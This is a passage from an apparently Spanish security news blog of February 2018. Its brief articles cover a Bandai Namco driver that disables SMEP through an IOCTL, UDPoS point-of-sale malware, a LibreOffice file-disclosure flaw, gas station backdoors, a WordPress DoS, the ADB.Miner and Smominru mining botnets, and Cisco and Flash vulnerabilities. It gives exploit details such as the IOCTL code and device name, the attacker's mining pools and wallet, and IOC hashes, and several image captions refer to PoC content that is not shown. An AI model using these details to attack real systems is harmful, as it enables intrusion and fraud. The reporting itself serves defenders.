Para poder entender esto, tenemos que conocer qué es SMEP. SMEP (Supervisor Mode Execution Protection), es una característica que marca todas las páginas disponibles para distinguirlas entre aquellas que pueden ejecutar código en ring-0 o no. SMEP se encuentra activo cuando el bit SMAP del registro CR4 y la paginación se encuentran establecidos. Con este mecanismo, todos los intentos implícitos de lectura de memoria de paginas en user-land con un privilegio menor que ring-3 serán bloqueadas siempre que SMAP esté habilitado.

Durante su ejecución, se observa que una página de user-space es llamada desde el driver de CAPCOM justo después de que se cree una petición IOCTL (0x0AA012044) al DeviceObject \\.\Htsysm7838 - Este comportamiento no debería ser válido, ya que SMEP no lo permite; por lo que se debería generar una excepción de violación de acceso y detener el sistema con un BSOD.


Flujo de llamadas para habilitar y deshabilitar SMEP.
En este fragmento, podemos observar cómo esta rutina que contiene un puntero a una función en userspace, deshabilita SMEP para llamar a dicha función en user-land. Tras esto, rehabilita SMEP volviendo a su estado original. 
Para poder llamar a dicha función, necesitaríamos tener el bit CR4 (que mencionamos al principio de la entrada) que es justo lo que la función indicada como disableSMEP hace.

Analizando el driver podemos observar que solo acepta dos IOCTL:


IOCTL validos.
Este driver no tiene ninguna comprobación de seguridad extra, por tanto cualquier aplicación desde user-land podría explotar el IOControlCode a través de la API DeviceIoControl, conociendo el código de control del driver.


Definición de kernel32!DeviceIoControl (https://msdn.microsoft.com/es-es/library/windows/desktop/aa363216(v=vs.85).aspx)
Prueba de concepto de la vulnerabilidad. 
Resultado de la prueba de concepto. Aunque se podría haber incluido una shellcode y el resultado sería distinto.
Por tanto, un atacante podría crear una aplicación desde user-land y provocar la ejecución de código o provocar un crash en el sistema. Para hacer la prueba, se ha utilizado una cadena basura para demostrar el problema, sin embargo es posible utilizar una shellcode. En caso de que el Driver no estuviera instalado en el sistema, al estar firmado no habrá problemas para incorporarlo al sistema por parte de un atacante. 




Al ser informados BANDAI NAMCO eliminaron el driver problemático que ya no es cargado por el juego, siendo la actuación similar al driver de CAPCOM.

Fernando Díaz
fdiaz@hispasec.comMás información:
SMEP: What is it, and how to beat it on Windows:
http://j00ru.vexillium.org/?p=783

Supervisor Mode Access Prevention (SMEP):
https://en.wikipedia.org/wiki/Supervisor_Mode_Access_Prevention

Elevation of privileges in Namco Driver:https://securelist.com/elevation-of-privileges-in-namco-driver/83707/
Categories: Seguridad

UDPoS, el malware que afecta a puntos de venta

Mon, 12/02/2018 - 12:00
UDPoS es un malware de puntos de venta que envía la información vía DNS disfrazado de actualización de la aplicación LogMeIn


Recientemente se ha descubierto una nueva variedad de malware que afecta principalmente a puntos de venta (PoS) y envía la información de las tarjetas robadas a través del protocolo DNS. El uso de este protoloco es algo a destacar, ya que lo más común en este tipo de malware es usar el protocolo HTTP. Este malware se hace pasar por una actualización de LogMeIn.

El malware se presenta con nombres como 'logmeinumon.exe, update.exe, LogMeInServicePack_5.115.22.001.exe' y se comunica con servidores de control alojados en Suiza. La primera vez que se ejecuta genera un archivo 'infobat.bat' que se usa para hacer una firma del sistema y poder identificar las máquinas infectadas. A continuación escanea la máquina infectada y la información recopilada se aloja en un fichero llamado 'PCi.jpg', que se envía al servidor C2 a través de DNS. Por último, crea persistencia en el sistema (se asegura de sobrevivir al reinicio de la máquina).


Malware UDPoS, extraída de: forcepointC2 y Hashes


Extraída de: forcepointExtraída de: forcepoint

El malware también busca software antivirus en la máquina infectada o si está siendo ejecutado en una máquina virtual.

Extraída de: forcepoint
Los investigadores de Forcepoint que lo han descubierto comentan que parece ser una versión en desarrollo, ya que no se puede asegurar que esté en funcionamiento completamente. Tal vez esto sólo sea una prueba del malware...

Volviendo al envío de datos robados, como ya comentamos el uso del protocolo DNS no es una elección común, pero tampoco es algo único. A continuación, recordamos algunos malwares que usan esta misma técnica para enviar los datos robados:
Extraída de:  akamail.com
LogMeIn ha publicado una aviso a sus clientes el cual podéis leer aquí.




Mario Parra
@MPAlonso_Más información:
Investigación completa del malware:https://blogs.forcepoint.com/es/security-labs/udpos-exfiltrating-credit-card-data-dns





Categories: Seguridad

Vulnerabilidad en LibreOffice

Sun, 11/02/2018 - 10:00
Remote Arbitrary File Disclosure en LibreOffice
Esta vulnerabilidad se encuentra en el soporte que da LibreOffice a la función "COM.MICROSOFT.WEBSERVICE" se trata de una función que se encarga de mostrar datos de Internet o de una intranet en nuestros documentos de LibreOffice Calc.

Función 

Esta función recibe un parámetro que debe ser una URL de cualquier servicio web. Existen una serie de restricciones sobre esta función, devolverá #VALUE! error :

  1. Si no puede obtener los datos del WebService.
  2. Si se devuelve una cadena no válida o que contenga más caracteres que lo permitido por las celdas (longitud máxima: 32767).
  3. Si la URL contiene una cadena de más de 2048 caracteres permitidos en una petición GET
  4. No están soportados los protocolos 'file://' o 'ftp://'


La vulnerabilidad se encuentra en nuestro punto número 4. Esta restricción no está implementada en LibreOffice. Por defecto las celdas no se actualizan, pero si se especifica el tipo de celda como '~error' hará que la celda se actualice cuando se abra el documento.
Explotación

Para explotar esta vulnerabilidad se necesita enviar los archivos desde el usuario actual por lo que se necesita la ruta de su carpeta de usuario, para explotarla solo necesitamos:

Explotación

También podemos hacer una llamada a otros ficheros muchos más importantes.Es posible explotar esta vulnerabilidad en otros formatos que no sean los de LibreOffice.

Impacto y versiones vulnerables
Es muy preocupante la facilidad de enviar cualquier archivo con información sensible.
Por ahora las versiones de LibreOffice vulnerables a este ataque son:

  • LibreOffice 5.4.5 hasta 6.0.1
  • Explotable en cualquier plataforma Linux/Windows/macOS


Créditos
Reportada por Mikhail Klementev (@jollheef)


Mario ParraMás información:
Función COM.MICROSOFT.WEBSERVICE:https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4
Reporte
http://seclists.org/fulldisclosure/2018/Feb/32

Prueba de conceto (PoC):
https://github.com/jollheef/libreoffice-remote-arbitrary-file-disclosure










Categories: Seguridad

Vulnerabilidades en software de gasolineras

Sat, 10/02/2018 - 10:00
Hace unos meses, Kaspersky detectó una amenaza crítica de seguridad. Resultó ser una simple interfaz web que en realidad era un enlace a una gasolinera real, haciéndola manipulable de manera remota.

La interfaz web no resultó ser solo eso, sino que era en realidad una máquina ejecutando un controlador basado en linux con un pequeño servidor httpd. Según el fabricante, el software del controlador se encarga de gestionar todos los componentes de la gasolinera: Dispensadores, terminales de pago... Algunos de estos controladores llevaban gestionando estaciones más de 10 años, y llevan expuestos a internet desde entonces.

Según los especialistas de Kaspersky, en el momento de la investigación localizaron donde se encontraban las estaciones activas. Mayormente en Estados Unidos y la India, aunque también se encontraron en un porcentaje considerable en España y Chile.


Países afectados por estos dispositivos.

Una vez conocida la información del dispositivo, era sencillo obtener la documentación de este. Los manuales del fabricante eran bastante detallados, llegando a incluir capturas de pantalla, comandos, credenciales por defecto e incluso una guía paso a paso sobre cómo acceder y manejar cada interfaz. Solo con esto, se puede tener conocimiento de como funciona la aplicación.


Esquema del funcionamiento de la aplicación y los controladores.
Observando la interfaz, podemos ver que es sencilla para utilizar por los operarios de la gasolinera. Sin embargo, en el caso de que el operario sea un usuario malicioso puede llevar a cabo distintas acciones entre ellas modificar informes, recibos o incluso el precio de la gasolina. Estos privilegios, que deberían ser accesibles solo al administrador pueden ser utilizados por cualquier usuario. 




También es interesante que, en el esquema anterior no encontramos ninguna referencia a medidas de seguridad o de protección contra la interfaz. 
Los investigadores de Kaspersky volcaron el firmware del dispositivo para poder analizarlo, llegando a darse cuenta de una ingrata sorpresa: el fabricante había dejado unas credenciales hardcodeadas a modo de backdoor, en caso de que el dispositivo requiriese permisos mayores o acceso local con los privilegios mas altos. Cualquier dispositivo de dicho fabricante cuenta con las mismas credenciales hardcodeadas. 



Entre otras vulnerabilidades, resulta interesante que se pueda obtener la localización exacta de la gasolinera. Existe un componente que genera informes diariamente,  incluyendo el nombre de la estación además su localización. 

Haciendo uso de las credenciales encontradas en el código del firmware, se pueden cambiar los precios de la gasolina. El atacante tendría que investigar los productos de la gasolinera con estas credenciales hasta dar con el producto que corresponda a la gasolina para poder modificar su precio. 

Tras el análisis por los investigadores de Kasperksy, concluyeron que un atacante que conozca las credenciales hardcodeadas tendría acceso a:


  • Apagar todos los sistemas de provisionamiento
  • Filtro de combustible
  • Cambiar los precios de los productos
  • Robar dinero a través de la terminal de pago
  • Obtener información de las licencias de los vehículos y sus dueños
  • Bloquear la estación a cambio de un rescate.
  • Ejecutar código remoto
  • Moverse libremente dentro de la red de la estación


Fernando Díaz
fdiaz@hispasec.com
Más información:
Flaws in gas station software:
https://motherboard.vice.com/en_us/article/43qkgb/flaws-in-gas-station-software-let-hackers-change-prices-steal-fuel-erase-evidence
Gas is too expensive:https://securelist.com/expensive-gas/83542/
Categories: Seguridad

Riesgos de usar WhatsApp Web en entornos corporativos

Fri, 09/02/2018 - 14:42
WhatsApp Web está siendo ampliamente utilizado en entornos empresariales, pese a que su política de uso deja claro que solo puede utilizarse para uso personal. La razón de su uso se debe a que permite renderizar WhatsApp en tu navegador, para no tener que estar acudiendo al teléfono móvil si quieres usar la famosa aplicación adquirida por Facebook en 2014.



Los problemas de seguridad relacionados con la utilización de este tipo de software deriva en la facilidad de filtrar información y la complejidad de establecer medidas de control sobre la información que sale a través de estas aplicaciones. Concretamente, WhatsApp Web es una aplicación web relativamente compleja en su forma de comunicarse. Por ejemplo, en un primer momento solo tenía compatibilidad con Google Chrome debido a que era el único navegador que integraba la tecnología WebRTC en ese momento (a día de hoy es soportada por la mayoría de los navegadores).

En un principio WhatsApp Web solo se podía usar desde terminales Android, pero la aplicación ha ido evolucionando permitiendo la compatibilidad con iOS. Esta limitación era debida a limitaciones en la API de iOS al manejar las aplicaciones en segundo plano, ya que no permitía mantener una conexión abierta a un servidor ni aceptar conexiones entrantes desde el navegador.
El modelo de funcionamiento de esta aplicación web contempla dos formas de uso:


  • Si comparten conexión WiFi el equipo y el terminal móvil, la conexión se establecerá del equipo al móvil mediante la WiFi, y del móvil a los servidores finales de WhatsApp usando la conexión de datos (o la misma conexión WiFi si no está disponible la conexión de datos).
  • En caso de que no compartan conexión WiFi, el equipo se comunica con servidores intermedios de WhatsApp a través de su conexión a Internet (sin pasar por el móvil). Estos servidores intermedios de WhatsApp contactan con el móvil a través de su conexión de datos, y finalmente el móvil envía los mensajes a través de su conexión de datos (u otra WiFI externa) a los servidores finales de WhatsApp.

En resumidas cuentas, la aplicación web no es más que una forma de control remoto sobre la aplicación de WhatsApp que funciona en el móvil. Es fácil darse cuenta de esto, ya que cuando el móvil pierde conexión a Internet, WhatsApp Web deja de funcionar al instante. Lo cierto es que simplifica bastante la gestión de la seguridad por parte de WhatsApp si te obligan a pasar por el móvil, y se aseguran de que el usuario no se desvincula de la aplicación móvil.

La segunda forma de uso (compartiendo WiFi) se puede controlar filtrando fácilmente a nivel de red, sin embargo la primera forma de uso es algo más complicada de controlar, y es más fácil su filtrado a nivel de los equipos de sobremesa de los empleados. Particularmente, es más complicado su filtrado si el móvil se conecte a los servidores finales de WhatsApp a través de su conexión de datos, en vez de usar la WiFi. Si hablamos de la primera forma, la complejidad, debemos considerar de que el tráfico de red no saldrá por nuestra conexión a Internet y la complejidad del filtrado aumenta.

No obstante, si controlamos la configuración de red de cada uno de los equipos, una solución sencilla para controlar ambas formas de uso sería bloquear la resolución de nombres del dominio 'web.whatsapp.com'. Este dominio es el usado por WhatsApp Web, de forma que impediríamos efectivamente el acceso a la aplicación web. Una de las formas de hacerlo: Modificar el archivo '/etc/hosts' en Linux o 'C:\WINDOWS\system32\drivers\etc\hosts' en Windows para que apunte a localhost (una forma clásica de impedir la resolución de un dominio).

127.0.0.1 web.whatsapp.com 

Habría que tener cuidado con las cachés de las que disponen los navegadores modernos, que en algunos casos guardan las resoluciones de los dominios, y aunque actualmente se haya apuntado el dominio a otra dirección, pueden seguir cargando la dirección antigua real. También existen algunas otras formas de llevar a cabo este bloqueo, como el uso de plugins, o el filtrado desde el propio firewall del equipo.



Fernando Ramírez
@fdrg21

Más información:

Campaña internacional de fraude por Whatsapp a diferentes supermercadoshttp://laboratorio.blogs.hispasec.com/2015/08/campana-internacional-de-fraude-por.html
Categories: Seguridad

El lunes negro de WordPress: actualizaciones con fallos y vulnerabilidades que no se solucionan

Thu, 08/02/2018 - 09:30
Definitivamente esta semana no es la mejor para el CMS que, dicen, supone casi el 30% de sitios de Internet. Un fallo introducido en la ultima actualización impide actualizar automáticamente, y una vulnerabilidad que tiene como impacto la denegación de servicio no será solucionada.




El lunes se publicaba la versión 4.9.3, solucionando un total de 43 fallos, aunque ninguno de ellos de seguridad. Como es habitual cada vez que hay una actualización, el anuncio de la nueva versión al final rezaba: 


Sites that support automatic background updates are already beginning to update automatically.
Pero esto nunca llego a suceder. Irónicamente, la actualización se publicó con un fallo que impide al sistema de actualizaciones automáticas seguir funcionando, o lo que es lo mismo: tras esta instalación, WordPress dejará de actualizarse automáticamente. Esta funcionalidad se implementó en la versión 3.7, precisamente para dar respuesta a la gran cantidad instalaciones vulnerables (algunos estudios afirmaban que suponían el 70% del total). 

Para solucionar la situación, el mismo martes se publicó la versión 4.9.4. Sin embargo, al haber quedado el sistema inservible, para actualizar se requieren operaciones manuales por parte del usuario:

Unfortunately yesterdays 4.9.3 release contained a severe bug which was only discovered after release. The bug will cause WordPress to encounter an error when it attempts to update itself to WordPress 4.9.4, and will require an update to be performed through the WordPress dashboard or hosts update tools.
Esto podría suponer que muchos sitios queden estancados en la versión 4.9.3 hasta que sus administradores ejecuten la operación.

Más malas noticias: una denegación de servicio que no se solucionará

Por si esto fuera poco, el mismo lunes el investigador Barak Tawily publicaba un artículo donde describía una vulnerabilidad que afecta a casi cualquier instalación de WordPress, provocando una denegación de servicio.
La vulnerabilidad se encuentra en el fichero 'load-scripts.php'. Este se utiliza para pedir al servidor varios ficheros estáticos en una sola petición, reduciendo así el número total de peticiones. 
Como parámetro se pasa al fichero un array llamado load[] que contendrá nombres de ficheros estáticos. No todos los estáticos pueden servirse a través de esta petición, solo los definidos en el listado interno $wp_scripts, y nunca se servirán repetidos, aunque ni falta que hace: en ese listado hay un total de 181 ficheros que suponen un número similar de acciones de I/O y un peso del fichero de respuesta de casi 4MB.


Dado que esta petición es muy pesada, una repetición constante de la misma puede provocar la sobrecarga del servidor, llevando finalmente a la denegación de servicio. Y peor aún, el fichero 'load-scripts.php' no requiere autenticación para ser llamado ya que, aunque forma parte de la zona de administración, es también accesible desde la pantalla de entrada 'wp-login.php'.
A pesar de la facilidad de explotación, WordPress no ha aceptado la vulnerabilidad, ya que según responden a Tawily:"This kind of thing should really be mitigated at the server or network level rather than the application level, which is outside of WordPress's control."Aun así, Tawily ha publicado su propio parche y un script que soluciona la vulnerabilidad.




Francisco Lópezflopez@hispasec.com@zisk0
Más información:

How to DoS 29% of the World Wide Websites - CVE-2018-6389:
https://baraktawily.blogspot.com.es/2018/02/how-to-dos-29-of-world-wide-websites.html


WordPress 4.9.4 Maintenance Release:
https://wordpress.org/news/2018/02/wordpress-4-9-4-maintenance-release/




Categories: Seguridad

ADB.Miner: nueva botnet dedicada al minado de criptomonedas

Wed, 07/02/2018 - 09:00
El pasado 3 de febrero un nuevo gusano dirigido al minado de criptomonedas empezó a propagarse rápidamente a través de dispositivos Android, principalmente en China y Corea del Sur.


El malware en cuestión busca dispositivos con el puerto 5555 abierto, utilizado por la herramienta de depuración 'ADB'. Para realizar estos escaneos utiliza partes del módulo de exploración SYN de MIRAI.

NetworkScan Mon - http://scan.netlab.360.com/#/dashboard
La gráfica muestra el aumento significativo de los escaneos dirigidos al puerto 5555. Situándose en poco tiempo en el TOP 10 de NetLab. Algo que no ocurría desde la campaña de MIRAI en septiembre de 2016.

NetworkScan Mon - http://scan.netlab.360.com/#/dashboard
La mayoría de dispositivos infectados son móviles y aparatos de smart TV basados en Android con la interfaz de depuración 'ADB' activada. Estos dispositivos intentan propagar el malware de forma activa. Para ello, el dispositivo inicia un escaneo del puerto 5555 e intenta infectar a otra víctima con la herramienta de depuración 'adb' activa:

  1. Se conecta por 'adb' al dispositivo remoto.
  2. Replica y ejecuta el código malicioso en el nuevo dispositivo.



Proceso de propagación - Fuente: http://blog.netlab.360.com/
Mientras tanto, el dispositivo infectado se dedica a minar la criptomoneda 'Monero (XMR)' utilizando el software 'xmrig':

Configuración de xmrig - Fuente: http://blog.netlab.360.com/
  • Pool: pool.monero.hashvault.pro:5555 o pool.minexmr.com:7777
  • Contraseña del Pool: x
  • Dirección de la cartera: 44XT4KvmobTQfeWa6PCQF5RDosr2MLWm43AsaE3o5iNRXXTfDbYk2VPHTVedTQHZyfXNzMn8YYF2466d3FSDT7gJS8gdHAr


A día de hoy todavía no se ha efectuado ningún ingreso en la cartera del atacante:


Como medida preventiva se recomienda desactivar la herramienta de depuración de Android cuando no se esté utilizando.

IOCs

  • MD5 (bot.dat) bc84e86f8090f935e0f1fc04b04455c6
  • MD5 (botsuinit_1_1.txt) cd37d59f2aac9101715b28f2b28b7417
  • MD5 (config.json) 27c3e74b6ddf175c3827900fe06d63b3
  • MD5 (droidbot) 412874e10fe6d7295ad7eb210da352a1
  • MD5 (droidbot.apk) 914082a04d6db5084a963e9f70fb4276
  • MD5 (nohup) 9a10ba1d64a02ee308cd6479959d2db2
  • MD5 (sss) 6a22c94d6e2a18acf2377c994d0186af
  • MD5 (xmrig32) ac344c3accbbc4ee14db0e18f81c2c0d
  • MD5 (xmrig64) cc7775f1682d12ba4edb161824e5a0e4




Francisco Salido
fsalido@hispasec.com
Más información:
Early Warning: ADB.Miner A Mining Botnet Utilizing Android ADB Is Now Rapidly Spreading
http://blog.netlab.360.com/early-warning-adb-miner-a-mining-botnet-utilizing-android-adb-is-now-rapidly-spreading-en/

ADB.Miner 安卓蠕虫的更多信息
http://blog.netlab.360.com/adb-miner-more-information/




Categories: Seguridad

Botnet 'Smominru' afecta a más de 500.000 equipos usando EternalBlue

Tue, 06/02/2018 - 11:06
El famoso exploit de la NSA que salió a la luz el año pasado sigue causando estragos.




A pesar de la reciente caída de las criptomonedas, infectar equipos para minar sigue siendo un negocio en alza entre los ciberdelincuentes debido a su simpleza y utilidad.

Monero (XMR) sigue siendo la moneda favorita para minar ilegalmente gracias a que te proporciona mayor anonimato a la hora de realizar transacciones. 

La vulnerabilidad utilizada que se dio a conocer con WannaCry y que paralizó a medio mundo sigue siendo uno de los principales vectores de ataque para este tipo de malware. Con parche de seguridad disponible desde Marzo de 2017, EternalBlue (CVE-2017-0144 SMB) sigue siendo una de las vulnerabilidades más explotadas.

Smominru (también conocido como Ismo) se ha expandido por muchas zonas, pero la mayoría de los equipos infectados se encuentran en Rusia, India y Taiwán. La razón de que haya más infecciones en estos países es que aún no han tomado conciencia de la necesidad de actualizar sus sistemas a fin de mejorar su seguridad y el número de instalaciones de parches de seguridad en Windows es muy bajo.

El malware ha infectado alrededor de 526.000 sistemas Windows desde Mayo de 2017, lo cuál ha hecho que los atacantes minen 8.900 Monero, que corresponden a 1,86 millones de dólares (actualmente, tras la caída de las criptomonedas).

Los expertos de ProofPoint notificaron al servicio de protección DDoS SharkTech que la infraestructura de comando y control de 'Smominru' se encontraba alojada en sus servidores, sin embargo no obtuvieron respuesta.

Según varios investigadores, esta botnet va a seguir expandiéndose a lo largo del año.



Daniel Púa
@arrowcode_
dpua@hispasec.com
Más información:
Análisis de ProofPoint:https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators





Categories: Seguridad

Vulnerabilidad crítica en Cisco ASA y FTD permite ejecución remota de código y DoS

Mon, 05/02/2018 - 09:30
La vulnerabilidad se encuentra en la capa SSL de la funcionalidad VPN de ambos productos y ha recibido la puntuación máxima posible al considerarse crítica.



Cisco ha publicado el pasado día 29 un parche de seguridad para solucionar un fallo crítico en la capa SSL de la funcionalidad VPN de Cisco Adaptive Security Appliance (ASA) con identificador CVE-2018-0101. Cisco ha otorgado el CVSS máximo a esta vulnerabilidad y ha publicado la siguiente lista de productos afectados:

  • 3000 Series Industrial Security Appliance (ISA)
  • ASA 5500 Series Adaptive Security Appliances
  • ASA 5500-X Series Next-Generation Firewalls
  • ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
  • ASA 1000V Cloud Firewall
  • Adaptive Security Virtual Appliance (ASAv)
  • Firepower 2100 Series Security Appliance
  • Firepower 4110 Security Appliance
  • Firepower 9300 ASA Security Module
  • Firepower Threat Defense Software (FTD)

La vulnerabilidad es explotable cuando la funcionalidad webvpn se encuentra activa y una interfaz se encuentra como 'enabled' en la configuración. Al cumplirse las condiciones, un atacante puede aprovechar el fallo para enviar paquetes XML especialmente manipulados y provocar un intento de duplicar una región libre en memoria, lo que produce el error. Firepower Threat Defense (FTD) también es vulnerable al incluir éste ASA.

El error permite la ejecución remota de código en los productos afectados y el reinicio del dispositivo. La única solución, a parte de desactivar la funcionalidad, es aplicar el parche liberado. Las versiones vulnerables son las 8.x y 9.x de ASA, y las posteriores a 6.2.2 de FTD. Los usuarios de ASA 8.x deben actualizar al menos a la versión 9.1.7.20.


Juan José Oyague
Más información:
Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability:https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1

CVE-2018-0101:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-0101





Categories: Seguridad

Nuevo 0-day en Flash Player, o el cuento de nunca acabar

Sun, 04/02/2018 - 21:13
Ni siquiera el hecho de ser una tecnología en retirada está salvando a Adobe Flash Player de vulnerabilidades 0-day. En esta ocasión es el CERT de Corea del Sur el que detecta una vulnerabilidad desconocida que ya está siendo activamente explotada.



Aunque quedan tres años para el adios definitivo a Adobe Flash, aun hay tiempo suficiente para que los atacantes sigan viendo en este un vector de ataque con garantías de éxito. Esta vez se trata de una vulnerabilidad 0-day en Adobe Flash Player, que según el aviso publicado por el CERT de Corea del Sur está siendo activamente explotada. 

Identificada como CVE-2018-4878 y catalogada como crítica, la vulnerabilidad se basa en un fallo 'use-after-free' que puede dar lugar a la ejecución de código arbitrario de forma remota. Entre los sistemas afectados se encuentran todas las versiones de Flash Player hasta la 28.0.0.137 (esta incluida) en las versiones para navegadores Chrome, Internet Explorer y Edge. También están afectadas las versiones de escritorio para Windows, Macintosh, Linux y ChromeOS.

Adobe, según anuncia en su propio boletín, no publicara parches para solucionar esta vulnerabilidad hasta algún momento indeterminado de la semana próxima, a pesar de que reconoce saber que está siendo explotada.

A este respecto, el vector utilizado está siendo documentos de Microsoft Office que embeben contenido Flash malicioso. Por tanto, el ataque en cuestión tiene como objetivo a usuarios de Microsoft Windows. Aunque las fuentes oficiales no se han pronunciado, algunos investigadores apuntan a que puede estar relacionado con prácticas de espionaje de Corea del Norte desde al menos mediados de noviembre.

Mientras Adobe no publica una nueva versión que solucione la vulnerabilidad, las contramedidas ofrecidas pasan por configurar Flash Player para que pida autorización para ejecutar ficheros Flash o activar la vista protegida de Microsoft Office, que abrirá los ficheros potencialmente inseguros en modo de solo lectura.


Francisco Lópezflopez@hispasec.com@zisk0
Más información:
Adobe Flash Player New Vulnerability Advisory Recommendation:
https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998
Security Advisory for Flash Player | APSA18-01:
https://helpx.adobe.com/security/products/flash-player/apsa18-01.html

Categories: Seguridad

Pages